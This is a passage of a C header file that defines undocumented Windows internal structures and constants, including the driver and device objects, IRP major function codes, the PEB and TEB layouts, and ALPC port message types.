0x00000048\n#define FILE_DEVICE_USBEX 0x00000049\n#define FILE_DEVICE_CONSOLE 0x00000050\n#define FILE_DEVICE_NFP 0x00000051\n#define FILE_DEVICE_SYSENV 0x00000052\n#define FILE_DEVICE_VIRTUAL_BLOCK 0x00000053\n#define FILE_DEVICE_POINT_OF_SERVICE 0x00000054\n\n#define FILE_BYTE_ALIGNMENT 0x00000000\n#define FILE_WORD_ALIGNMENT 0x00000001\n#define FILE_LONG_ALIGNMENT 0x00000003\n#define FILE_QUAD_ALIGNMENT 0x00000007\n#define FILE_OCTA_ALIGNMENT 0x0000000f\n#define FILE_32_BYTE_ALIGNMENT 0x0000001f\n#define FILE_64_BYTE_ALIGNMENT 0x0000003f\n#define FILE_128_BYTE_ALIGNMENT 0x0000007f\n#define FILE_256_BYTE_ALIGNMENT 0x000000ff\n#define FILE_512_BYTE_ALIGNMENT 0x000001ff\n\n#define DPC_NORMAL 0\n#define DPC_THREADED 1\n\ntypedef struct _DEVICE_OBJECT {\n\tCSHORT Type;\n\tUSHORT Size;\n\tLONG ReferenceCount;\n\tstruct _DRIVER_OBJECT *DriverObject;\n\tstruct _DEVICE_OBJECT *NextDevice;\n\tstruct _DEVICE_OBJECT *AttachedDevice;\n\tstruct _IRP *CurrentIrp;\n\tPVOID\t\t Timer;\n\tULONG Flags;\n\tULONG Characteristics;\n\t__volatile PVPB Vpb;\n\tPVOID DeviceExtension;\n\tDEVICE_TYPE DeviceType;\n\tCCHAR StackSize;\n\tunion {\n\t\tLIST_ENTRY ListEntry;\n\t\tWAIT_CONTEXT_BLOCK Wcb;\n\t} Queue;\n\tULONG AlignmentRequirement;\n\tKDEVICE_QUEUE DeviceQueue;\n\tKDPC Dpc;\n\tULONG ActiveThreadCount;\n\tPSECURITY_DESCRIPTOR SecurityDescriptor;\n\tKEVENT DeviceLock;\n\tUSHORT SectorSize;\n\tUSHORT Spare1;\n\tstruct _DEVOBJ_EXTENSION * DeviceObjectExtension;\n\tPVOID Reserved;\n} DEVICE_OBJECT, *PDEVICE_OBJECT;\n\ntypedef struct _DEVOBJ_EXTENSION {\n\n\tCSHORT Type;\n\tUSHORT Size;\n\n\t//\n\t// Public part of the DeviceObjectExtension structure\n\t//\n\n\tPDEVICE_OBJECT DeviceObject; // owning device object\n\n\t// end_ntddk end_nthal end_ntifs end_wdm end_ntosp\n\n\t//\n\t// Universal Power Data - all device objects must have this\n\t//\n\n\tULONG PowerFlags; // see ntos\\po\\pop.h\n\t// WARNING: Access via PO macros\n\t// and with PO locking rules ONLY.\n\n\t//\n\t// Pointer to the non-universal power data\n\t// Power data that only some device objects need is stored in the\n\t// device object power extension -> DOPE\n\t// see po.h\n\t//\n\n\tstruct _DEVICE_OBJECT_POWER_EXTENSION *Dope;\n\n\t//\n\t// power state information\n\t//\n\n\t//\n\t// Device object extension flags. Protected by the IopDatabaseLock.\n\t//\n\n\tULONG ExtensionFlags;\n\n\t//\n\t// PnP manager fields\n\t//\n\n\tPVOID DeviceNode;\n\n\t//\n\t// AttachedTo is a pointer to the device object that this device\n\t// object is attached to. The attachment chain is now doubly\n\t// linked: this pointer and DeviceObject->AttachedDevice provide the\n\t// linkage.\n\t//\n\n\tPDEVICE_OBJECT AttachedTo;\n\n\t//\n\t// The next two fields are used to prevent recursion in IoStartNextPacket\n\t// interfaces.\n\t//\n\n\tLONG StartIoCount; // Used to keep track of number of pending start ios.\n\tLONG StartIoKey; // Next startio key\n\tULONG StartIoFlags; // Start Io Flags. Need a separate flag so that it can be accessed without locks\n\tPVPB Vpb; // If not NULL contains the VPB of the mounted volume.\n\t// Set in the filesystem's volume device object.\n\t// This is a reverse VPB pointer.\n\n\t// begin_ntddk begin_wdm begin_nthal begin_ntifs begin_ntosp\n\n} DEVOBJ_EXTENSION, *PDEVOBJ_EXTENSION;\n\ntypedef struct _FAST_IO_DISPATCH {\n\tULONG SizeOfFastIoDispatch;\n\tPVOID FastIoCheckIfPossible;\n\tPVOID FastIoRead;\n\tPVOID FastIoWrite;\n\tPVOID FastIoQueryBasicInfo;\n\tPVOID FastIoQueryStandardInfo;\n\tPVOID FastIoLock;\n\tPVOID FastIoUnlockSingle;\n\tPVOID FastIoUnlockAll;\n\tPVOID FastIoUnlockAllByKey;\n\tPVOID FastIoDeviceControl;\n\tPVOID AcquireFileForNtCreateSection;\n\tPVOID ReleaseFileForNtCreateSection;\n\tPVOID FastIoDetachDevice;\n\tPVOID FastIoQueryNetworkOpenInfo;\n\tPVOID AcquireForModWrite;\n\tPVOID MdlRead;\n\tPVOID MdlReadComplete;\n\tPVOID PrepareMdlWrite;\n\tPVOID MdlWriteComplete;\n\tPVOID FastIoReadCompressed;\n\tPVOID FastIoWriteCompressed;\n\tPVOID MdlReadCompleteCompressed;\n\tPVOID MdlWriteCompleteCompressed;\n\tPVOID FastIoQueryOpen;\n\tPVOID ReleaseForModWrite;\n\tPVOID AcquireForCcFlush;\n\tPVOID ReleaseForCcFlush;\n} FAST_IO_DISPATCH, *PFAST_IO_DISPATCH;\n\n#define IO_TYPE_ADAPTER 0x00000001\n#define IO_TYPE_CONTROLLER 0x00000002\n#define IO_TYPE_DEVICE 0x00000003\n#define IO_TYPE_DRIVER 0x00000004\n#define IO_TYPE_FILE 0x00000005\n#define IO_TYPE_IRP 0x00000006\n#define IO_TYPE_MASTER_ADAPTER 0x00000007\n#define IO_TYPE_OPEN_PACKET 0x00000008\n#define IO_TYPE_TIMER 0x00000009\n#define IO_TYPE_VPB 0x0000000a\n#define IO_TYPE_ERROR_LOG 0x0000000b\n#define IO_TYPE_ERROR_MESSAGE 0x0000000c\n#define IO_TYPE_DEVICE_OBJECT_EXTENSION 0x0000000d\n\n#define IRP_MJ_CREATE 0x00\n#define IRP_MJ_CREATE_NAMED_PIPE 0x01\n#define IRP_MJ_CLOSE 0x02\n#define IRP_MJ_READ 0x03\n#define IRP_MJ_WRITE 0x04\n#define IRP_MJ_QUERY_INFORMATION 0x05\n#define IRP_MJ_SET_INFORMATION 0x06\n#define IRP_MJ_QUERY_EA 0x07\n#define IRP_MJ_SET_EA 0x08\n#define IRP_MJ_FLUSH_BUFFERS 0x09\n#define IRP_MJ_QUERY_VOLUME_INFORMATION 0x0a\n#define IRP_MJ_SET_VOLUME_INFORMATION 0x0b\n#define IRP_MJ_DIRECTORY_CONTROL 0x0c\n#define IRP_MJ_FILE_SYSTEM_CONTROL 0x0d\n#define IRP_MJ_DEVICE_CONTROL 0x0e\n#define IRP_MJ_INTERNAL_DEVICE_CONTROL 0x0f\n#define IRP_MJ_SHUTDOWN 0x10\n#define IRP_MJ_LOCK_CONTROL 0x11\n#define IRP_MJ_CLEANUP 0x12\n#define IRP_MJ_CREATE_MAILSLOT 0x13\n#define IRP_MJ_QUERY_SECURITY 0x14\n#define IRP_MJ_SET_SECURITY 0x15\n#define IRP_MJ_POWER 0x16\n#define IRP_MJ_SYSTEM_CONTROL 0x17\n#define IRP_MJ_DEVICE_CHANGE 0x18\n#define IRP_MJ_QUERY_QUOTA 0x19\n#define IRP_MJ_SET_QUOTA 0x1a\n#define IRP_MJ_PNP 0x1b\n#define IRP_MJ_PNP_POWER IRP_MJ_PNP \n#define IRP_MJ_MAXIMUM_FUNCTION 0x1b\n\ntypedef struct _DRIVER_EXTENSION {\n\n\t//\n\t// Back pointer to Driver Object\n\t//\n\n\tstruct _DRIVER_OBJECT *DriverObject;\n\n\t//\n\t// The AddDevice entry point is called by the Plug & Play manager\n\t// to inform the driver when a new device instance arrives that this\n\t// driver must control.\n\t//\n\n\tPVOID AddDevice;\n\n\t//\n\t// The count field is used to count the number of times the driver has\n\t// had its registered reinitialization routine invoked.\n\t//\n\n\tULONG Count;\n\n\t//\n\t// The service name field is used by the pnp manager to determine\n\t// where the driver related info is stored in the registry.\n\t//\n\n\tUNICODE_STRING ServiceKeyName;\n\n} DRIVER_EXTENSION, *PDRIVER_EXTENSION;\n\n#define DRVO_UNLOAD_INVOKED 0x00000001\n#define DRVO_LEGACY_DRIVER 0x00000002\n#define DRVO_BUILTIN_DRIVER 0x00000004 // Driver objects for Hal, PnP Mgr\n#define DRVO_REINIT_REGISTERED 0x00000008\n#define DRVO_INITIALIZED 0x00000010\n#define DRVO_BOOTREINIT_REGISTERED 0x00000020\n#define DRVO_LEGACY_RESOURCES 0x00000040\n// end_ntddk end_nthal end_ntifs end_ntosp\n#define DRVO_BASE_FILESYSTEM_DRIVER 0x00000080 // A driver that is at the bottom of the filesystem stack.\n// begin_ntddk begin_nthal begin_ntifs begin_ntosp\n\ntypedef struct _DRIVER_OBJECT {\n\tCSHORT Type;\n\tCSHORT Size;\n\n\t//\n\t// The following links all of the devices created by a single driver\n\t// together on a list, and the Flags word provides an extensible flag\n\t// location for driver objects.\n\t//\n\n\tPDEVICE_OBJECT DeviceObject;\n\tULONG Flags;\n\n\t//\n\t// The following section describes where the driver is loaded. The count\n\t// field is used to count the number of times the driver has had its\n\t// registered reinitialization routine invoked.\n\t//\n\n\tPVOID DriverStart;\n\tULONG DriverSize;\n\tPVOID DriverSection; //PLDR_DATA_TABLE_ENTRY\n\tPDRIVER_EXTENSION DriverExtension;\n\n\t//\n\t// The driver name field is used by the error log thread\n\t// determine the name of the driver that an I/O request is/was bound.\n\t//\n\n\tUNICODE_STRING DriverName;\n\n\t//\n\t// The following section is for registry support. Thise is a pointer\n\t// to the path to the hardware information in the registry\n\t//\n\n\tPUNICODE_STRING HardwareDatabase;\n\n\t//\n\t// The following section contains the optional pointer to an array of\n\t// alternate entry points to a driver for \"fast I/O\" support. Fast I/O\n\t// is performed by invoking the driver routine directly with separate\n\t// parameters, rather than using the standard IRP call mechanism. Note\n\t// that these functions may only be used for synchronous I/O, and when\n\t// the file is cached.\n\t//\n\n\tPFAST_IO_DISPATCH FastIoDispatch;\n\n\t//\n\t// The following section describes the entry points to this particular\n\t// driver. Note that the major function dispatch table must be the last\n\t// field in the object so that it remains extensible.\n\t//\n\n\tPVOID DriverInit;\n\tPVOID DriverStartIo;\n\tPVOID DriverUnload;\n\tPVOID MajorFunction[IRP_MJ_MAXIMUM_FUNCTION + 1];\n\n} DRIVER_OBJECT;\ntypedef struct _DRIVER_OBJECT *PDRIVER_OBJECT;\n\ntypedef struct _LDR_RESOURCE_INFO {\n\tULONG_PTR Type;\n\tULONG_PTR Name;\n\tULONG Lang;\n} LDR_RESOURCE_INFO, *PLDR_RESOURCE_INFO;\n\ntypedef struct _LDR_DATA_TABLE_ENTRY_COMPATIBLE {\n\tLIST_ENTRY InLoadOrderLinks;\n\tLIST_ENTRY InMemoryOrderLinks;\n\tunion\n\t{\n\t\tLIST_ENTRY InInitializationOrderLinks;\n\t\tLIST_ENTRY InProgressLinks;\n\t} DUMMYUNION0;\n\tPVOID DllBase;\n\tPVOID EntryPoint;\n\tULONG SizeOfImage;\n\tUNICODE_STRING FullDllName;\n\tUNICODE_STRING BaseDllName;\n\tULONG Flags;\n\tWORD ObsoleteLoadCount;\n\tWORD TlsIndex;\n\tunion\n\t{\n\t\tLIST_ENTRY HashLinks;\n\t\tstruct\n\t\t{\n\t\t\tPVOID SectionPointer;\n\t\t\tULONG CheckSum;\n\t\t};\n\t} DUMMYUNION1;\n\tunion\n\t{\n\t\tULONG TimeDateStamp;\n\t\tPVOID LoadedImports;\n\t} DUMMYUNION2;\n\t//fields below removed for compatibility\n} LDR_DATA_TABLE_ENTRY_COMPATIBLE, *PLDR_DATA_TABLE_ENTRY_COMPATIBLE;\ntypedef LDR_DATA_TABLE_ENTRY_COMPATIBLE LDR_DATA_TABLE_ENTRY;\ntypedef LDR_DATA_TABLE_ENTRY_COMPATIBLE *PLDR_DATA_TABLE_ENTRY;\ntypedef LDR_DATA_TABLE_ENTRY *PCLDR_DATA_TABLE_ENTRY;\n\n/*\n* WDM END\n*/\n\n/*\n* NTQSI Modules START\n*/\n\ntypedef struct _RTL_PROCESS_MODULE_INFORMATION {\n\tHANDLE Section;\n\tPVOID MappedBase;\n\tPVOID ImageBase;\n\tULONG ImageSize;\n\tULONG Flags;\n\tUSHORT LoadOrderIndex;\n\tUSHORT InitOrderIndex;\n\tUSHORT LoadCount;\n\tUSHORT OffsetToFileName;\n\tUCHAR FullPathName[256];\n} RTL_PROCESS_MODULE_INFORMATION, *PRTL_PROCESS_MODULE_INFORMATION;\n\ntypedef struct _RTL_PROCESS_MODULES {\n\tULONG NumberOfModules;\n\tRTL_PROCESS_MODULE_INFORMATION Modules[1];\n} RTL_PROCESS_MODULES, *PRTL_PROCESS_MODULES;\n\n/*\n*\tNTQSI Modules END\n*/\n\n/*\n** Virtual Memory START\n*/\n\ntypedef enum _MEMORY_INFORMATION_CLASS\n{\n\tMemoryBasicInformation,\n\tMemoryWorkingSetInformation,\n\tMemoryMappedFilenameInformation,\n\tMemoryRegionInformation,\n\tMemoryWorkingSetExInformation\n} MEMORY_INFORMATION_CLASS, *PMEMORY_INFORMATION_CLASS;\n\ntypedef struct _MEMORY_REGION_INFORMATION {\n\tPVOID AllocationBase;\n\tULONG AllocationProtect;\n\tULONG RegionType;\n\tSIZE_T RegionSize;\n} MEMORY_REGION_INFORMATION, *PMEMORY_REGION_INFORMATION;\n\n/*\n** Virtual Memory END\n*/\n\n/*\n** System Firmware START\n*/\n\ntypedef enum _SYSTEM_FIRMWARE_TABLE_ACTION\n{\n\tSystemFirmwareTable_Enumerate,\n\tSystemFirmwareTable_Get\n} SYSTEM_FIRMWARE_TABLE_ACTION, *PSYSTEM_FIRMWARE_TABLE_ACTION;\n\ntypedef struct _SYSTEM_FIRMWARE_TABLE_INFORMATION {\n\tULONG ProviderSignature;\n\tSYSTEM_FIRMWARE_TABLE_ACTION Action;\n\tULONG TableID;\n\tULONG TableBufferLength;\n\tUCHAR TableBuffer[ANYSIZE_ARRAY];\n} SYSTEM_FIRMWARE_TABLE_INFORMATION, *PSYSTEM_FIRMWARE_TABLE_INFORMATION;\n\n/*\n** System Firmware END\n*/\n\n//\n// PEB/TEB\n//\ntypedef struct _PEB_LDR_DATA\n{\n\tULONG Length;\n\tBOOLEAN Initialized;\n\tHANDLE SsHandle;\n\tLIST_ENTRY InLoadOrderModuleList;\n\tLIST_ENTRY InMemoryOrderModuleList;\n\tLIST_ENTRY InInitializationOrderModuleList;\n\tPVOID EntryInProgress;\n\tBOOLEAN ShutdownInProgress;\n\tHANDLE ShutdownThreadId;\n} PEB_LDR_DATA, *PPEB_LDR_DATA;\n\ntypedef struct _GDI_HANDLE_ENTRY\n{\n\tunion\n\t{\n\t\tPVOID Object;\n\t\tPVOID NextFree;\n\t};\n\tunion\n\t{\n\t\tstruct\n\t\t{\n\t\t\tUSHORT ProcessId;\n\t\t\tUSHORT Lock : 1;\n\t\t\tUSHORT Count : 15;\n\t\t};\n\t\tULONG Value;\n\t} Owner;\n\tUSHORT Unique;\n\tUCHAR Type;\n\tUCHAR Flags;\n\tPVOID UserPointer;\n} GDI_HANDLE_ENTRY, *PGDI_HANDLE_ENTRY;\n\n#define GDI_MAX_HANDLE_COUNT 0x4000\n\ntypedef struct _GDI_SHARED_MEMORY\n{\n\tGDI_HANDLE_ENTRY Handles[GDI_MAX_HANDLE_COUNT];\n} GDI_SHARED_MEMORY, *PGDI_SHARED_MEMORY;\n\n#define FLS_MAXIMUM_AVAILABLE 128\n#define TLS_MINIMUM_AVAILABLE 64\n#define TLS_EXPANSION_SLOTS 1024\n\n#define DOS_MAX_COMPONENT_LENGTH 255\n#define DOS_MAX_PATH_LENGTH (DOS_MAX_COMPONENT_LENGTH + 5)\n\ntypedef struct _CURDIR\n{\n\tUNICODE_STRING DosPath;\n\tHANDLE Handle;\n} CURDIR, *PCURDIR;\n\n#define RTL_USER_PROC_CURDIR_CLOSE 0x00000002\n#define RTL_USER_PROC_CURDIR_INHERIT 0x00000003\n\ntypedef struct _RTL_DRIVE_LETTER_CURDIR\n{\n\tUSHORT Flags;\n\tUSHORT Length;\n\tULONG TimeStamp;\n\tSTRING DosPath;\n} RTL_DRIVE_LETTER_CURDIR, *PRTL_DRIVE_LETTER_CURDIR;\n\n#define RTL_MAX_DRIVE_LETTERS 32\n#define RTL_DRIVE_LETTER_VALID (USHORT)0x0001\n\ntypedef struct _RTL_USER_PROCESS_PARAMETERS\n{\n\tULONG MaximumLength;\n\tULONG Length;\n\n\tULONG Flags;\n\tULONG DebugFlags;\n\n\tHANDLE ConsoleHandle;\n\tULONG ConsoleFlags;\n\tHANDLE StandardInput;\n\tHANDLE StandardOutput;\n\tHANDLE StandardError;\n\n\tCURDIR CurrentDirectory;\n\tUNICODE_STRING DllPath;\n\tUNICODE_STRING ImagePathName;\n\tUNICODE_STRING CommandLine;\n\tPVOID Environment;\n\n\tULONG StartingX;\n\tULONG StartingY;\n\tULONG CountX;\n\tULONG CountY;\n\tULONG CountCharsX;\n\tULONG CountCharsY;\n\tULONG FillAttribute;\n\n\tULONG WindowFlags;\n\tULONG ShowWindowFlags;\n\tUNICODE_STRING WindowTitle;\n\tUNICODE_STRING DesktopInfo;\n\tUNICODE_STRING ShellInfo;\n\tUNICODE_STRING RuntimeData;\n\tRTL_DRIVE_LETTER_CURDIR CurrentDirectories[RTL_MAX_DRIVE_LETTERS];\n\n\tULONG EnvironmentSize;\n\tULONG EnvironmentVersion;\n} RTL_USER_PROCESS_PARAMETERS, *PRTL_USER_PROCESS_PARAMETERS;\n\n#define GDI_HANDLE_BUFFER_SIZE32 34\n#define GDI_HANDLE_BUFFER_SIZE64 60\n\n#if !defined(_M_X64)\n#define GDI_HANDLE_BUFFER_SIZE GDI_HANDLE_BUFFER_SIZE32\n#else\n#define GDI_HANDLE_BUFFER_SIZE GDI_HANDLE_BUFFER_SIZE64\n#endif\n\ntypedef ULONG GDI_HANDLE_BUFFER32[GDI_HANDLE_BUFFER_SIZE32];\ntypedef ULONG GDI_HANDLE_BUFFER64[GDI_HANDLE_BUFFER_SIZE64];\ntypedef ULONG GDI_HANDLE_BUFFER[GDI_HANDLE_BUFFER_SIZE];\n\ntypedef struct _PEB\n{\n\tBOOLEAN InheritedAddressSpace;\n\tBOOLEAN ReadImageFileExecOptions;\n\tBOOLEAN BeingDebugged;\n\tunion\n\t{\n\t\tBOOLEAN BitField;\n\t\tstruct\n\t\t{\n\t\t\tBOOLEAN ImageUsesLargePages : 1;\n\t\t\tBOOLEAN IsProtectedProcess : 1;\n\t\t\tBOOLEAN IsLegacyProcess : 1;\n\t\t\tBOOLEAN IsImageDynamicallyRelocated : 1;\n\t\t\tBOOLEAN SkipPatchingUser32Forwarders : 1;\n\t\t\tBOOLEAN SpareBits : 3;\n\t\t};\n\t};\n\tHANDLE Mutant;\n\n\tPVOID ImageBaseAddress;\n\tPPEB_LDR_DATA Ldr;\n\tPRTL_USER_PROCESS_PARAMETERS ProcessParameters;\n\tPVOID SubSystemData;\n\tPVOID ProcessHeap;\n\tPRTL_CRITICAL_SECTION FastPebLock;\n\tPVOID AtlThunkSListPtr;\n\tPVOID IFEOKey;\n\tunion\n\t{\n\t\tULONG CrossProcessFlags;\n\t\tstruct\n\t\t{\n\t\t\tULONG ProcessInJob : 1;\n\t\t\tULONG ProcessInitializing : 1;\n\t\t\tULONG ProcessUsingVEH : 1;\n\t\t\tULONG ProcessUsingVCH : 1;\n\t\t\tULONG ProcessUsingFTH : 1;\n\t\t\tULONG ReservedBits0 : 27;\n\t\t};\n\t\tULONG EnvironmentUpdateCount;\n\t};\n\tunion\n\t{\n\t\tPVOID KernelCallbackTable;\n\t\tPVOID UserSharedInfoPtr;\n\t};\n\tULONG SystemReserved[1];\n\tULONG AtlThunkSListPtr32;\n\tPVOID ApiSetMap;\n\tULONG TlsExpansionCounter;\n\tPVOID TlsBitmap;\n\tULONG TlsBitmapBits[2];\n\tPVOID ReadOnlySharedMemoryBase;\n\tPVOID HotpatchInformation;\n\tPVOID *ReadOnlyStaticServerData;\n\tPVOID AnsiCodePageData;\n\tPVOID OemCodePageData;\n\tPVOID UnicodeCaseTableData;\n\n\tULONG NumberOfProcessors;\n\tULONG NtGlobalFlag;\n\n\tLARGE_INTEGER CriticalSectionTimeout;\n\tSIZE_T HeapSegmentReserve;\n\tSIZE_T HeapSegmentCommit;\n\tSIZE_T HeapDeCommitTotalFreeThreshold;\n\tSIZE_T HeapDeCommitFreeBlockThreshold;\n\n\tULONG NumberOfHeaps;\n\tULONG MaximumNumberOfHeaps;\n\tPVOID *ProcessHeaps;\n\n\tPVOID GdiSharedHandleTable;\n\tPVOID ProcessStarterHelper;\n\tULONG GdiDCAttributeList;\n\n\tPRTL_CRITICAL_SECTION LoaderLock;\n\n\tULONG OSMajorVersion;\n\tULONG OSMinorVersion;\n\tUSHORT OSBuildNumber;\n\tUSHORT OSCSDVersion;\n\tULONG OSPlatformId;\n\tULONG ImageSubsystem;\n\tULONG ImageSubsystemMajorVersion;\n\tULONG ImageSubsystemMinorVersion;\n\tULONG_PTR ImageProcessAffinityMask;\n\tGDI_HANDLE_BUFFER GdiHandleBuffer;\n\tPVOID PostProcessInitRoutine;\n\n\tPVOID TlsExpansionBitmap;\n\tULONG TlsExpansionBitmapBits[32];\n\n\tULONG SessionId;\n\n\tULARGE_INTEGER AppCompatFlags;\n\tULARGE_INTEGER AppCompatFlagsUser;\n\tPVOID pShimData;\n\tPVOID AppCompatInfo;\n\n\tUNICODE_STRING CSDVersion;\n\n\tPVOID ActivationContextData;\n\tPVOID ProcessAssemblyStorageMap;\n\tPVOID SystemDefaultActivationContextData;\n\tPVOID SystemAssemblyStorageMap;\n\n\tSIZE_T MinimumStackCommit;\n\n\tPVOID *FlsCallback;\n\tLIST_ENTRY FlsListHead;\n\tPVOID FlsBitmap;\n\tULONG FlsBitmapBits[FLS_MAXIMUM_AVAILABLE / (sizeof(ULONG) * 8)];\n\tULONG FlsHighIndex;\n\n\tPVOID WerRegistrationData;\n\tPVOID WerShipAssertPtr;\n\tPVOID pContextData;\n\tPVOID pImageHeaderHash;\n\tunion\n\t{\n\t\tULONG TracingFlags;\n\t\tstruct\n\t\t{\n\t\t\tULONG HeapTracingEnabled : 1;\n\t\t\tULONG CritSecTracingEnabled : 1;\n\t\t\tULONG SpareTracingBits : 30;\n\t\t};\n\t};\n} PEB, *PPEB;\n\ntypedef struct _TEB_ACTIVE_FRAME_CONTEXT\n{\n\tULONG Flags;\n\tPSTR FrameName;\n} TEB_ACTIVE_FRAME_CONTEXT, *PTEB_ACTIVE_FRAME_CONTEXT;\n\ntypedef struct _TEB_ACTIVE_FRAME\n{\n\tULONG Flags;\n\tstruct _TEB_ACTIVE_FRAME *Previous;\n\tPTEB_ACTIVE_FRAME_CONTEXT Context;\n} TEB_ACTIVE_FRAME, *PTEB_ACTIVE_FRAME;\n\n#define GDI_BATCH_BUFFER_SIZE 310\n\ntypedef struct _GDI_TEB_BATCH {\n\tULONG\tOffset;\n\tUCHAR\tAlignment[4];\n\tULONG_PTR HDC;\n\tULONG\tBuffer[GDI_BATCH_BUFFER_SIZE];\n} GDI_TEB_BATCH, *PGDI_TEB_BATCH;\n\ntypedef struct _TEB\n{\n\tNT_TIB NtTib;\n\n\tPVOID EnvironmentPointer;\n\tCLIENT_ID ClientId;\n\tPVOID ActiveRpcHandle;\n\tPVOID ThreadLocalStoragePointer;\n\tPPEB ProcessEnvironmentBlock;\n\n\tULONG LastErrorValue;\n\tULONG CountOfOwnedCriticalSections;\n\tPVOID CsrClientThread;\n\tPVOID Win32ThreadInfo;\n\tULONG User32Reserved[26];\n\tULONG UserReserved[5];\n\tPVOID WOW32Reserved;\n\tLCID CurrentLocale;\n\tULONG FpSoftwareStatusRegister;\n\tPVOID SystemReserved1[54];\n\tNTSTATUS ExceptionCode;\n\tPVOID ActivationContextStackPointer;\n#if defined(_M_X64)\n\tUCHAR SpareBytes[24];\n#else\n\tUCHAR SpareBytes[36];\n#endif\n\tULONG TxFsContext;\n\n\tGDI_TEB_BATCH GdiTebBatch;\n\tCLIENT_ID RealClientId;\n\tHANDLE GdiCachedProcessHandle;\n\tULONG GdiClientPID;\n\tULONG GdiClientTID;\n\tPVOID GdiThreadLocalInfo;\n\tULONG_PTR Win32ClientInfo[62];\n\tPVOID glDispatchTable[233];\n\tULONG_PTR glReserved1[29];\n\tPVOID glReserved2;\n\tPVOID glSectionInfo;\n\tPVOID glSection;\n\tPVOID glTable;\n\tPVOID glCurrentRC;\n\tPVOID glContext;\n\n\tNTSTATUS LastStatusValue;\n\tUNICODE_STRING StaticUnicodeString;\n\tWCHAR StaticUnicodeBuffer[261];\n\n\tPVOID DeallocationStack;\n\tPVOID TlsSlots[64];\n\tLIST_ENTRY TlsLinks;\n\n\tPVOID Vdm;\n\tPVOID ReservedForNtRpc;\n\tPVOID DbgSsReserved[2];\n\n\tULONG HardErrorMode;\n#if defined(_M_X64)\n\tPVOID Instrumentation[11];\n#else\n\tPVOID Instrumentation[9];\n#endif\n\tGUID ActivityId;\n\n\tPVOID SubProcessTag;\n\tPVOID EtwLocalData;\n\tPVOID EtwTraceData;\n\tPVOID WinSockData;\n\tULONG GdiBatchCount;\n\n\tunion\n\t{\n\t\tPROCESSOR_NUMBER CurrentIdealProcessor;\n\t\tULONG IdealProcessorValue;\n\t\tstruct\n\t\t{\n\t\t\tUCHAR ReservedPad0;\n\t\t\tUCHAR ReservedPad1;\n\t\t\tUCHAR ReservedPad2;\n\t\t\tUCHAR IdealProcessor;\n\t\t};\n\t};\n\n\tULONG GuaranteedStackBytes;\n\tPVOID ReservedForPerf;\n\tPVOID ReservedForOle;\n\tULONG WaitingOnLoaderLock;\n\tPVOID SavedPriorityState;\n\tULONG_PTR SoftPatchPtr1;\n\tPVOID ThreadPoolData;\n\tPVOID *TlsExpansionSlots;\n#if defined(_M_X64)\n\tPVOID DeallocationBStore;\n\tPVOID BStoreLimit;\n#endif\n\tULONG MuiGeneration;\n\tULONG IsImpersonating;\n\tPVOID NlsCache;\n\tPVOID pShimData;\n\tULONG HeapVirtualAffinity;\n\tHANDLE CurrentTransactionHandle;\n\tPTEB_ACTIVE_FRAME ActiveFrame;\n\tPVOID FlsData;\n\n\tPVOID PreferredLanguages;\n\tPVOID UserPrefLanguages;\n\tPVOID MergedPrefLanguages;\n\tULONG MuiImpersonation;\n\n\tunion\n\t{\n\t\tUSHORT CrossTebFlags;\n\t\tUSHORT SpareCrossTebBits : 16;\n\t};\n\tunion\n\t{\n\t\tUSHORT SameTebFlags;\n\t\tstruct\n\t\t{\n\t\t\tUSHORT SafeThunkCall : 1;\n\t\t\tUSHORT InDebugPrint : 1;\n\t\t\tUSHORT HasFiberData : 1;\n\t\t\tUSHORT SkipThreadAttach : 1;\n\t\t\tUSHORT WerInShipAssertCode : 1;\n\t\t\tUSHORT RanProcessInit : 1;\n\t\t\tUSHORT ClonedThread : 1;\n\t\t\tUSHORT SuppressDebugMsg : 1;\n\t\t\tUSHORT DisableUserStackWalk : 1;\n\t\t\tUSHORT RtlExceptionAttached : 1;\n\t\t\tUSHORT InitialThread : 1;\n\t\t\tUSHORT SpareSameTebBits : 1;\n\t\t};\n\t};\n\n\tPVOID TxnScopeEnterCallback;\n\tPVOID TxnScopeExitCallback;\n\tPVOID TxnScopeContext;\n\tULONG LockCount;\n\tULONG SpareUlong0;\n\tPVOID ResourceRetValue;\n} TEB, *PTEB;\n\n__inline struct _PEB * NtCurrentPeb() { return NtCurrentTeb()->ProcessEnvironmentBlock; }\n\n/*\n** PEB/TEB END\n*/\n\n/*\n** ALPC START\n*/\n\ntypedef struct _PORT_MESSAGE {\n\tunion {\n\t\tstruct {\n\t\t\tCSHORT DataLength;\n\t\t\tCSHORT TotalLength;\n\t\t} s1;\n\t\tULONG Length;\n\t} u1;\n\tunion {\n\t\tstruct {\n\t\t\tCSHORT Type;\n\t\t\tCSHORT DataInfoOffset;\n\t\t} s2;\n\t\tULONG ZeroInit;\n\t} u2;\n\tunion {\n\t\tCLIENT_ID ClientId;\n\t\tdouble DoNotUseThisField; // Force quadword alignment\n\t} u3;\n\tULONG MessageId;\n\tunion {\n\t\tULONG ClientViewSize; // Only valid on LPC_CONNECTION_REQUEST message\n\t\tULONG CallbackId; // Only valid on LPC_REQUEST message\n\t} u4;\n\tUCHAR Reserved[8];\n} PORT_MESSAGE, *PPORT_MESSAGE;\n\n// end_ntsrv\n\ntypedef struct _PORT_DATA_ENTRY {\n\tPVOID Base;\n\tULONG Size;\n} PORT_DATA_ENTRY, *PPORT_DATA_ENTRY;\n\ntypedef struct _PORT_DATA_INFORMATION {\n\tULONG CountDataEntries;\n\tPORT_DATA_ENTRY DataEntries[1];\n} PORT_DATA_INFORMATION, *PPORT_DATA_INFORMATION;\n\n#define LPC_REQUEST 1\n#define LPC_REPLY 2\n#define LPC_DATAGRAM 3\n#define LPC_LOST_REPLY 4\n#define LPC_PORT_CLOSED 5\n#define LPC_CLIENT_DIED 6\n#define LPC_EXCEPTION 7\n#define LPC_DEBUG_EVENT 8\n#define LPC_ERROR_EVENT 9\n#define LPC_CONNECTION_REQUEST 10\n\n#define PORT_VALID_OBJECT_ATTRIBUTES (OBJ_CASE_INSENSITIVE)\n#define PORT_MAXIMUM_MESSAGE_LENGTH 256\n\ntypedef struct _LPC_CLIENT_DIED_MSG {\n\tPORT_MESSAGE PortMsg;\n\tLARGE_INTEGER CreateTime;\n} LPC_CLIENT_DIED_MSG, *PLPC_CLIENT_DIED_MSG;\n\ntypedef struct _PORT_VIEW {\n\tULONG Length;\n\tHANDLE SectionHandle;\n\tULONG SectionOffset;\n\tULONG ViewSize;\n\tPVOID ViewBase;\n\tPVOID ViewRemoteBase;\n} PORT_VIEW, *PPORT_VIEW;\n\ntypedef struct _REMOTE_PORT_VIEW {\n\tULONG Length;\n\tULONG ViewSize;\n\tPVOID 